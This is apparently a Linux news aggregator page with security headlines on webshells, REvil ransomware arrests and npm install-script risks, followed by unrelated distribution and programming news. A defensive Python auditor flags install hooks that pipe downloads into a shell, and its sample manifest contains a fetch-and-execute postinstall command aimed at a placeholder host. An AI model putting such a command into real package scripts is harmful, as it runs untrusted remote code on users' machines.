Proprietary Software and Security Issues

  • Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer [iophk: Windows TCO]

    Both Godzilla and NGLite were developed with Chinese instructions and are publicly available for download on GitHub. We believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks. Godzilla is a functionality-rich webshell that parses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via an HTTP response. This allows attackers to keep code likely to be flagged as malicious off the target system until they are ready to dynamically execute it.

  • [Crackers] breach nine global organizations in ongoing espionage campaign [iophk: Windows TCO]

    A [cracking] group with potential ties to China has breached nine global organizations as part of an ongoing espionage effort mostly targeting the defense sector, findings made public Sunday revealed.

    According to a report from cybersecurity company Palo Alto Networks, the [crackers] targeted at least 370 organizations running potentially vulnerable Zoho servers in the U.S. alone, successfully compromising at least one, as part of a wider global campaign.

  • International coalition arrests [crackers] linked to thousands of ransomware attacks [iophk: Windows TCO]

    Europol on Monday announced the arrests, which took place Thursday, saying that the two individuals arrested are alleged to be behind more than 5,000 cyberattacks and are accused of having gained more than half a million Euros in ransomware payments made by victims.

    The arrests were the latest in a string of operations pursued by a coalition of international partners against REvil, with Europol saying Monday that three other individuals associated with REvil, along with two others associated with a linked cyber crime group, have been arrested since February.

  • REvil Ransom Arrest, $6M Seizure, and $10M Reward

    The U.S. Department of Justice today announced the arrest of a Ukrainian man accused of deploying ransomware on behalf of the REvil ransomware gang, a Russian-speaking cybercriminal collective that has extorted hundreds of millions from victim organizations. The DOJ also said it had seized $6.1 million in cryptocurrency sent to another REvil affiliate, and that the U.S. Department of State is now offering up to $10 million for the name or location of any key REvil leaders, and up to $5 million for information on REvil affiliates.

  • DOJ charges 2 men allegedly behind REvil ransomware attacks [iophk: Windows TCO]

    Yaroslav Vasinskyi, a Ukrainian national arrested last month in Poland, and Yevgeniy Polyanin, a Russian national who remains at large, face charges of fraud, conspiracy and money laundering. Vasinskyi was charged in connection with his alleged role in carrying out the devastating July 4 ransomware attack against the software firm Kaseya, which in turn affected hundreds of companies within the U.S.

  • 77% Indian organisations faced downtime due to cyber risk during festive season [iophk: Windows TCO]

    New Delhi: During peak festive season in the last 18 months, 77 per cent of organisations in India experienced downtime due to cybersecurity risk, while 81 per cent of global organisations experienced increased cyber threats during Covid-19, a new report revealed on Tuesday.

    According to McAfee Enterprise and FireEye's report titled 'Cybercrime in a Pandemic World: The Impact of Covid-19', the top three most threatening cyber risks that were detected are malware attacks (47 per cent), data breaches (43 per cent), and ransomware and cloud jacking (33 per cent each). Over 30 per cent of the IT professionals also experienced vulnerabilities in their 'Internet of Things' devices.

  • SolarWinds investors sue company over supply chain attacks [iophk: Windows TCO]

    The attacks came to light in December 2020 when American cyber security firm FireEye announced that it had identified a global campaign to compromise public and private sector bodies through corruption of software supply chains.

    FireEye is now known as Mandiant, taking on the name of a company that it acquired some years ago after selling its network, email and cloud security products, as well as the FireEye name, in June this year.

  • McAfee Corp to be taken private in $14-billion deal

    The investor group will acquire all outstanding shares of McAfee common stock for $26 per share in an all-cash deal that values McAfee at about $12 billion on an equity basis.

  • npm install is curl | bash

    npm (and yarn) will execute arbitrary code when you install a package via install scripts. A valid use-case is to build native code on installation, or do some other environment-specific setup, though these scripts have also been used to show ads and, of course, as an attack vector. In fact, install scripts were the most popular route for malware as of 2019.

    Installing a single malicious package is enough to get reasonably pwned. The risk is mitigated by npm’s moderation of the registry — they’re quick to remove malware once discovered. This works pretty well, though I worry about the day someone uses this to publish a self-replicating worm.

    This attack vector isn’t unique to npm. Other package managers like pip and RubyGems allow for the same thing. As developers, we’re not as cautious when installing packages from these registries as when we use curl | bash, though we should be.

  • New DDoS attack vectors may spell trouble in future: Kaspersky

    Researchers at the Universities of Maryland and Colorado Boulder were credited with the TCP development, while the second was credited to security firm NexusGuard and named Black Storm.

    The TCP attack targets devices between a client and a server: firewalls, load balancers, network address translators, and deep packet inspection tools, many of which could interfere with a TCP connection.
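The npm item above makes the point that a dependency's `preinstall`, `install` and `postinstall` hooks run with the installing user's privileges, and that registry moderation is the main safety net. A practitioner can add a check of their own before trusting a lockfile. The following Python audit is an added example, not code from the quoted post or from npm itself: it parses a set of `package.json` manifests, reports every install-time lifecycle hook, and flags hooks whose command pipes a download straight into a shell. The package names and commands are constructed for illustration; the hook names and the `.npmrc` setting `ignore-scripts=true` are real npm behaviour.

```python
"""Audit npm manifests for install-time lifecycle scripts (added example).

Only the hook names and the .npmrc key are real npm conventions; the
sample manifests below are constructed for this illustration.
"""
import json

# Hooks npm runs automatically for a dependency during `npm install`.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# Hooks also run for the root project (and for git dependencies).
ROOT_HOOKS = ("prepare", "prepublish")

# Constructed sample manifests: a legitimate native build, a package with
# no install hooks, and one that fetches and executes remote content.
SAMPLE_MANIFESTS = {
    "native-addon": json.dumps({
        "name": "native-addon", "version": "1.0.0",
        "scripts": {"install": "node-gyp rebuild", "test": "tap"},
    }),
    "plain-lib": json.dumps({
        "name": "plain-lib", "version": "2.3.1",
        "scripts": {"test": "mocha"},
    }),
    "odd-helper": json.dumps({
        "name": "odd-helper", "version": "0.0.7",
        "scripts": {"postinstall": "curl -s https://example.invalid/x | sh"},
    }),
}


def lifecycle_scripts(manifest_text):
    """Return {hook: command} for each install-time hook in a package.json."""
    scripts = json.loads(manifest_text).get("scripts", {})
    return {h: scripts[h] for h in INSTALL_HOOKS + ROOT_HOOKS if h in scripts}


def looks_like_remote_fetch(command):
    """Heuristic: first pipeline stage downloads, a later stage executes it."""
    stages = [s.strip().split() for s in command.split("|")]
    if len(stages) < 2 or not stages[0]:
        return False
    downloads = stages[0][0] in ("curl", "wget")
    executes = any(s and s[0] in ("sh", "bash", "node") for s in stages[1:])
    return downloads and executes


def audit(manifests):
    """List one finding per hook that would run code at install time."""
    findings = []
    for name, text in manifests.items():
        for hook, command in lifecycle_scripts(text).items():
            findings.append({
                "package": name,
                "hook": hook,
                "command": command,
                "remote_fetch": looks_like_remote_fetch(command),
            })
    return findings


def npmrc_mitigation():
    """The project-level .npmrc line that disables lifecycle scripts."""
    return "ignore-scripts=true"


if __name__ == "__main__":
    for f in audit(SAMPLE_MANIFESTS):
        marker = "SUSPICIOUS" if f["remote_fetch"] else "review"
        print(f"[{marker}] {f['package']} {f['hook']}: {f['command']}")
    print("Mitigation for CI and casual installs:", npmrc_mitigation())
```

Running it lists `native-addon` as a hook to review (a native build is the legitimate use the post describes) and `odd-helper` as suspicious. With `ignore-scripts=true` in `.npmrc`, packages that genuinely need a build step must be rebuilt explicitly, which is the trade-off the post's "curl | bash" comparison implies.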

More in Tux Machines

Ubuntu 21.04 (Hirsute Hippo) Reached End of Life, Upgrade to Ubuntu 21.10 Now

Dubbed by Canonical as the “Hirsute Hippo,” Ubuntu 21.04 was released nine months ago, on April 22nd, 2021. It was the first Ubuntu release to use the next-generation Wayland display server by default for its Ubuntu Desktop flavor, which uses a modified version of the GNOME desktop environment. Ubuntu 21.04 didn’t make the plunge into the GNOME 40 desktop environment series due to its redesigned Activities Overview, but it did ship with support for GNOME 40 apps while being built on top of the older GNOME 3.38 desktop environment series. Read more

today's leftovers

  • Supplino is a variable benchtop power supply that you can build yourself | Arduino Blog

    Working with electronics requires access to stable power in a variety of voltages. Some components require 3.3V and others require 5V. Still others need 9V or 12V — there are many possibilities. You could keep a variety of wall warts on hand, but a variable benchtop power supply is a more convenient option. Supplino is one choice and this guide from Giovanni Bernardo and Paolo Loberto will walk you through how to build one. Supplino can accept anything from 4 to 40 volts and can output anything from 1.25 to 36 volts, with a maximum of 5A. An XH-M401 module with an XL4016E1 DC-DC buck converter handles the voltage regulation. Technically, you could use that alone to power your components. But the addition of an Arduino Nano board (or Nano Every) makes the experience far friendlier. It monitors the power supply output and drives a 1.8″ 128×160 TFT LCD screen, which displays the present voltage, amperage, and wattage.

  • Relocating Fedora's RPM database [LWN.net]

    The deadlines for various kinds of Fedora 36 change proposals have mostly passed at this point, which led to something of a flurry of postings to the distribution's devel mailing list over the last month. One of those, for a seemingly fairly innocuous relocation of the RPM database from /var to /usr, came in right at the buzzer for system-wide changes on December 29. There were, of course, other things going on around that time, holidays, vacations, and so forth, so the discussion was relatively muted until recently. Proponents have a number of reasons why they would like to see the move, but there is resistance, as well, that is due, at least in part, to the longstanding "tradition" of the location for the database.

  • CPU Isolation – A practical example – by SUSE Labs (part 5)
  • How to install Mantis bug tracker on Debian 11?

    Hello friends. In this post, you will learn how to install Mantis Bug Tracker on Debian 11.

Server: MongoDB vs. DynamoDB, Mirantis, and More

  • MongoDB vs. DynamoDB: What you need to know

    NoSQL databases have become more popular because of the need for more flexible backend solutions. These databases run applications that require a more flexible data structure than traditional structured databases can provide. Robust feature-rich NoSQL database platforms famous for NoSQL databases include MongoDB and DynamoDB. This article guide will compare these two databases to help you choose the right one for your project.

  • Mirantis brings secure registries to Kubernetes distros | ZDNet

    Mirantis Secure Registry, formerly Docker Trusted Registry, provides an enterprise-grade container registry solution. You can use this as a foundation to build a secure software supply chain. It does this by providing you with access to a container image registry that has enhanced levels of security beyond that of public registries. This, in turn, gives you more control over this critical part of your software supply chain. The comprehensive, built-in security enables users to verify and trust the automated operations and integration with Continuous Integration/Continuous Delivery (CI/CD) pipelines to speed up application testing and delivery. You can use MSR alongside your other apps in any standard Kubernetes 1.20 and above distribution, via standard Helm techniques. While the new MSR is no longer integrated with Mirantis Kubernetes Engine (MKE) as it was earlier, it still runs as well as ever on MKE as it does with any other supported Kubernetes distribution.

  • How North Dakota Is More Like Windows than UNIX

    If your official name is YATES, you can't (and presumably needn't) file a petition to change it to Yates. "Petitioners have offered no authority or reasoned argument that there is any legal significance to the capitalization of their names."

  • The Success of ‘Open-hearted’ Partnerships in the Cloud | SUSE Communities

    The future is open — and it’s better together. At SUSE, we pride ourselves on our partnerships, and sometimes what we can achieve together surpasses even our greatest hopes. That’s what our award-winning, cloud-based, high-performance computing (HPC) partnership with UberCloud, Dassault Systèmes, and Google Cloud achieved, by enabling 3DT Holdings researchers to create an affordable, real-time heart surgery simulator for physicians to use when it matters most. This is an ongoing relationship with the Living Heart Project that we think is just the beginning of what this ground-breaking research can achieve — and the lives it can save.

Programming Leftovers

  • An outdated Python for openSUSE Leap [LWN.net]

    Enterprise distributions are famous for maintaining the same versions of software throughout their, normally five-year-plus, support windows. But many of the projects those distributions are based on have far shorter support periods; part of what the enterprise distributions sell is patching over those mismatches. But openSUSE Leap is not exactly an enterprise distribution, so some users are chafing under the restrictions that come from Leap being based on SUSE Enterprise Linux (SLE). In particular, shipping Python 3.6, which reached its end of life at the end of 2021, is seen as problematic for the upcoming Leap 15.4 release. [...] OpenSUSE and SLE have generally been aligned over the years. In 2020, Leap and SLE grew even closer together. The build system and repositories between the two were shared starting with Leap 15.2, which corresponded to the second "service pack" (SP) of SLE (i.e. SLE 15-SP2). In 2021, with Leap 15.3 and SLE 15-SP3, the two distributions effectively merged, such that all of the base packages were shared between the two. To a first approximation, Leap is an openSUSE-branded version of SLE, much like what CentOS used to be for Red Hat Enterprise Linux.

  • Make Your Python CLI Tools Pop With Rich | Hackaday

    It seems as though more and more of the simple command-line tools and small scripts that used to be bash or small C programs are slowly turning into Python programs. Of course, we will just have to wait and see if this ultimately turns out to be a good idea. But in the meantime, next time you’re revamping or writing a new tool, why not spice it up with Rich?